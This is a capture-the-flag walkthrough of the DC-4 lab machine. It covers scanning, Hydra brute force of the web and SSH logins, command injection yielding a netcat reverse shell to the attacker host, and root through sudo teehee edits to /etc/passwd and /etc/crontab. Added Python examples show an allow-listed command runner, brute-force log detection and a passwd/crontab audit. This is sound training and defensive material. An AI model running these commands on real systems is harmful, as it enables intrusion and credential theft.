Host discovery
Using netdiscover on Kali, I found the machine 192.168.234.179.
Port scanning
Using Nmap with the command nmap -sV -A 192.168.234.179 --script=vuln:
root@kali:~# nmap -sV -A 192.168.234.179 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-11 19:40 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.179
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.15.10
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.179
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.234.179:80/
| Form id:
| Form action: login.php
|
| Path: http://192.168.234.179:80/login.php
| Form id:
|_ Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: nginx/1.15.10
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:B1:DD:47 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.234.179
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.88 seconds
From the scan results we can see that the target has ports 80 and 22 open.
Let's visit port 80 first to look at the web service.
The site's page is very clean, with nothing else on it, which brought two things to mind:
1. Brute force
2. Directory scanning
I ran a directory scan against it with the dirsearch script, but it didn't turn up anything.
$ python dirsearch.py -u http://192.168.234.179/ -e *
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: * | HTTP method: get | Threads: 10 | Wordlist size: 6104
Error Log: H:\工具\dirsearch-master\logs\errors-20-02-11_19-50-11.log
Target: http://192.168.234.179/
[19:50:11] Starting:
[19:50:11] 400 - 158B - /%2e%2e/google.com
[19:50:18] 302 - 704B - /command.php -> index.php
[19:50:18] 301 - 170B - /css -> http://192.168.234.179/css/
[19:50:21] 301 - 170B - /images -> http://192.168.234.179/images/
[19:50:21] 200 - 506B - /index.php
[19:50:21] 403 - 15B - /INDEX.PHP
[19:50:21] 403 - 15B - /index.PHP
[19:50:22] 302 - 206B - /login.php -> index.php
Task Completed
Brute force
So only brute force is left. Based on the page content, I guessed the account is admin.
I used the tool Hydra to crack it; here I used Hydra's graphical version, xHydra.
The wordlist used here is /usr/share/wordlists/rockyou.txt.
If this is the first time using that wordlist, you need to run gunzip rockyou.txt.gz to decompress the password wordlist archive.
This is the target URL; the part after the colon is the fixed format of the POST submission.
/login.php:username=^USER^&password=^PASS^:S=logout
Finally, we get the password:
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 20:11:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.234.179:80/login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.234.179 login: admin password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 20:11:55
<finished>
Log in with the account admin:happy.
Command execution
It looks like there is command execution:
You are currently logged in
Run Command:
· List Files
Disk Usage
Disk Free
You have selected: ls -l
total 24
-rw-r--r-- 1 root root 1783 Apr 5 2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24 2019 css
drwxr-xr-x 2 root root 4096 Mar 24 2019 images
-rw-r--r-- 1 root root 506 Apr 6 2019 index.php
-rw-r--r-- 1 root root 1473 Apr 7 2019 login.php
-rw-r--r-- 1 root root 663 Mar 24 2019 logout.php
Commands really can be executed here.
Since it's a Linux system, let's find a way to run the command we want and get a reverse shell. (Heh heh, Burp!)
Executed successfully.
Then let's get a reverse shell!!!
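The page above works because whatever string the browser submits for "Run Command" (ls -l, du, df, or whatever Burp put in its place) reaches a shell unchanged. The following is an added example, not DC-4's own command.php: it shows the shape such a page should have, where the client submits only an opaque option id and the argv stays server-side. The option ids and the argv lists are assumptions for this example.

```python
"""Allow-listed command runner for a "Run Command" page.

Added example (not DC-4's own command.php). The client may only choose an
option id; the command text never comes from the client and never passes
through a shell.
"""
import subprocess
from typing import Dict, List

# Fixed mapping from an option id to an argv list. The ids are assumed names
# for this example; the commands mirror the three choices on the DC-4 page.
ALLOWED_COMMANDS: Dict[str, List[str]] = {
    "list_files": ["ls", "-l"],
    "disk_usage": ["du", "-sh", "."],
    "disk_free": ["df", "-h"],
}


def resolve_command(option_id: str) -> List[str]:
    """Return the argv for a known option id, or raise ValueError.

    Lookup is by exact key, so a tampered value such as "ls -l; id"
    (a constructed example of what an intercepting proxy could submit)
    has no entry and is rejected before anything is executed.
    """
    try:
        return list(ALLOWED_COMMANDS[option_id])
    except KeyError:
        raise ValueError(f"unknown command option: {option_id!r}") from None


def run_selected(option_id: str, cwd: str = ".") -> str:
    """Execute the allow-listed command and return its stdout."""
    argv = resolve_command(option_id)
    # shell=False (the default) hands argv straight to execve, so no shell
    # metacharacters are ever interpreted; the timeout bounds a slow command.
    result = subprocess.run(
        argv, cwd=cwd, capture_output=True, text=True, timeout=10, check=False
    )
    return result.stdout


if __name__ == "__main__":
    print(run_selected("list_files"))
    try:
        run_selected("ls -l; id")
    except ValueError as exc:
        print("rejected:", exc)
```

With this layout the radio buttons on the page carry values like list_files rather than command text, and a modified request can at most pick a different entry from the table.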
Reverse shell
First start a listener on Kali: nc -lvp 7777
In Burp, send the command nc 192.168.234.151 7777 -e /bin/bash
Then use the command python -c 'import pty;pty.spawn("/bin/bash")' to get an interactive shell.
Check privileges
www-data@dc-4:/usr/share/nginx/html$ whoami
whoami
www-data
Go to the /home directory:
www-data@dc-4:/home$ ls
ls
charles jim sam
www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls
ls
backups mbox test.sh
www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
This should be information for three accounts, but only jim's directory has anything in it. Let's look at backups.
www-data@dc-4:/home/jim$ cd bac
cd backups/
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
……
……
These should be jim's passwords, so let's use hydra to crack them.
root@kali:~# hydra -l jim -P passwd.txt -t 50 192.168.234.179 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-11 21:24:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 50 tasks per 1 server, overall 50 tasks, 253 login tries (l:1/p:253), ~6 tries per task
[DATA] attacking ssh://192.168.234.179:22/
[22][ssh] host: 192.168.234.179 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 47 final worker threads did not complete until end.
[ERROR] 47 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-11 21:24:42
The password is: jibril04
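Both Hydra runs in this write-up (the http-post-form attack on /login.php and the SSH attack on jim) leave a very recognisable trace: many login attempts from one source in a few seconds. The following is an added example, not a tool from the page, showing how a defender would spot both from nginx's access log and sshd's auth log. The log lines are constructed to resemble what those two runs would have produced; the threshold and window are assumptions.

```python
"""Burst detection for login brute force in web and SSH logs.

Added example covering both Hydra runs in this write-up. Not a tool from the
page; the sample log lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional, Tuple

NGINX_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
SSHD_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)'
)

Event = Tuple[datetime, str, str]  # (timestamp, source ip, service)


def parse_nginx(line: str) -> Optional[Event]:
    """POST /login.php only: every form-login attempt, pass or fail, lands here.
    The status code is deliberately ignored, so the rule does not depend on how
    this particular application signals a failed login."""
    m = NGINX_RE.match(line)
    if not m or m["method"] != "POST" or m["path"] != "/login.php":
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    return ts, m["ip"], "http-login"


def parse_sshd(line: str, year: int) -> Optional[Event]:
    """sshd 'Failed password' lines; syslog timestamps carry no year."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"], "ssh"


def find_bursts(events: Iterable[Event], threshold: int = 5,
                window: timedelta = timedelta(seconds=60)) -> Dict[Tuple[str, str], int]:
    """Return {(ip, service): most attempts inside any one window} for every
    source that reached `threshold` attempts within `window`."""
    by_key: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, ip, service in events:
        by_key[(ip, service)].append(ts)
    flagged: Dict[Tuple[str, str], int] = {}
    for key, stamps in by_key.items():
        stamps.sort()
        start, best = 0, 0
        for end in range(len(stamps)):          # sliding window over sorted times
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged


def analyze(nginx_lines: Iterable[str], sshd_lines: Iterable[str], year: int):
    events = [e for e in map(parse_nginx, nginx_lines) if e]
    events += [e for e in (parse_sshd(l, year) for l in sshd_lines) if e]
    return find_bursts(events)


# Constructed sample: 12 form logins from one source in 12 seconds (roughly
# what a Hydra run looks like to nginx), two ordinary requests from another
# host, and 8 failed SSH logins for jim from the same attacking source.
NGINX_LINES = [
    f'192.168.234.151 - - [11/Feb/2020:20:11:{44 + i:02d} +0800] '
    f'"POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"'
    for i in range(12)
] + [
    '192.168.234.20 - - [11/Feb/2020:20:11:50 +0800] "GET /index.php HTTP/1.1" 200 506 "-" "Mozilla/5.0"',
    '192.168.234.20 - - [11/Feb/2020:20:11:58 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
SSHD_LINES = [
    f"Feb 11 21:24:{34 + i:02d} dc-4 sshd[{1200 + i}]: Failed password for jim "
    f"from 192.168.234.151 port {51000 + i} ssh2"
    for i in range(8)
]

if __name__ == "__main__":
    for (ip, service), count in analyze(NGINX_LINES, SSHD_LINES, 2020).items():
        print(f"{ip} {service}: {count} attempts within 60 s")
```

The same count-per-source logic is what fail2ban-style tooling or a per-IP rate limit in nginx enforces; the point of counting POSTs to the login endpoint rather than a particular status code is that the rule keeps working whichever way the application answers a wrong password.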
SSH login
ssh -p 22 jim@192.168.234.179
Check mbox
jim@dc-4:/$ cd /home/jim
jim@dc-4:~$ ls
backups mbox test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
It's an email from root.
On Linux, mail is stored in /var/mail.
jim@dc-4:~$ cd /var
jim@dc-4:/var$ ls
backups cache lib local lock log mail opt run spool tmp www
jim@dc-4:/var$ cd mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
We got Charles's user password, so switch users.
jim@dc-4:/var/mail$ su charles
Password:
charles@dc-4:/var/mail$
Use the command sudo -l to check sudo privileges; it shows that teehee can be run without the root password.
I didn't know how to use this teehee, so I looked it up on Baidu.
From that, I got two privilege escalation methods from the experts.
Privilege escalation
First privilege escalation method
Modify the passwd file and write in a user with root privileges.
echo "hackergu::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Field explanation:
# e.g. admin:x:0:0::/home/admin:/bin/bash  # [username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]
Now privilege escalation has succeeded.
root@dc-4:/# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Second privilege escalation method
Escalate via a scheduled (cron) script.
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
With every time field set to *, it runs once a minute.
Setting /bin/sh's mode to 4777 lets a non-root user run it, and while it runs it has root privileges.
charles@dc-4:/$ echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:/$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
charles@dc-4:/$ /bin/sh
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
#
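Both methods above leave durable traces on the host: a second UID-0 entry with an empty password field in /etc/passwd, a root crontab line that hands a setuid bit to a shell, and, once cron has fired, a setuid /bin/sh. The following is an added example, not part of the write-up, of the checks a defender would run to find them. The two sample files are constructed to contain the exact lines the write-up appends; the finding labels and the regular expressions are assumptions for this example.

```python
"""Audit for the traces both escalation methods above leave behind.

Added example, not part of the write-up. Sample /etc/passwd and /etc/crontab
contents are constructed.
"""
import os
import re
import stat
from typing import Iterable, List, Tuple

Finding = Tuple[int, str, str]  # (line number, issue, subject)

PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001::/home/jim:/bin/bash
charles:x:1002:1002::/home/charles:/bin/bash
hackergu::0:0:::/bin/bash
"""

CRONTAB_SAMPLE = """SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod 4777 /bin/sh
"""

# chmod with a numeric mode whose leading digit sets setuid/setgid (2-7 in the
# first of four digits, e.g. 4777) or a symbolic mode that adds "s".
SETUID_CHMOD_RE = re.compile(
    r"\bchmod\b(?:\s+-\S+)*\s+(?:[2-7][0-7]{3}\b|[ugoa]*\+[rwxXt]*s)"
)
# System crontab line: five time fields, a user, then the command.
SYSTEM_CRON_RE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<command>.+)$")


def audit_passwd(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry", line))
            continue
        name, passwd, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, "non-root account with UID 0", name))
        if passwd == "":
            # An empty second field means no password is required at all;
            # "x" means the hash lives in /etc/shadow.
            findings.append((lineno, "empty password field", name))
    return findings


def audit_crontab(text: str) -> List[Finding]:
    """Flags system-crontab entries whose command grants a setuid/setgid bit.
    Only the five-field form is parsed; @reboot-style lines are skipped."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = SYSTEM_CRON_RE.match(line)
        if m and SETUID_CHMOD_RE.search(m["command"]):
            findings.append((lineno, f"setuid/setgid chmod scheduled as {m['user']}",
                             m["command"]))
    return findings


def has_setuid(mode: int) -> bool:
    return bool(mode & stat.S_ISUID)


def check_setuid_binaries(paths: Iterable[str]) -> List[str]:
    """Return the real paths of the given binaries that carry setuid.
    /bin/sh is normally a symlink (to dash on this target) and chmod follows
    it, so the bit lands on the link target; os.stat follows the link too."""
    hits = []
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        if has_setuid(st.st_mode):
            hits.append(os.path.realpath(p))
    return hits


if __name__ == "__main__":
    for f in audit_passwd(PASSWD_SAMPLE) + audit_crontab(CRONTAB_SAMPLE):
        print("line %d: %s (%s)" % f)
    print("setuid shells:", check_setuid_binaries(["/bin/sh", "/bin/bash", "/bin/dash"]))
```

On a live host, the same functions would read /etc/passwd and /etc/crontab directly; the setuid check deliberately reports the resolved path so that a bit placed on /bin/sh shows up as the dash binary it actually landed on.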
References:
https://blog.csdn.net/leesir98/article/details/101620077
https://www.jianshu.com/p/ac10a4149eef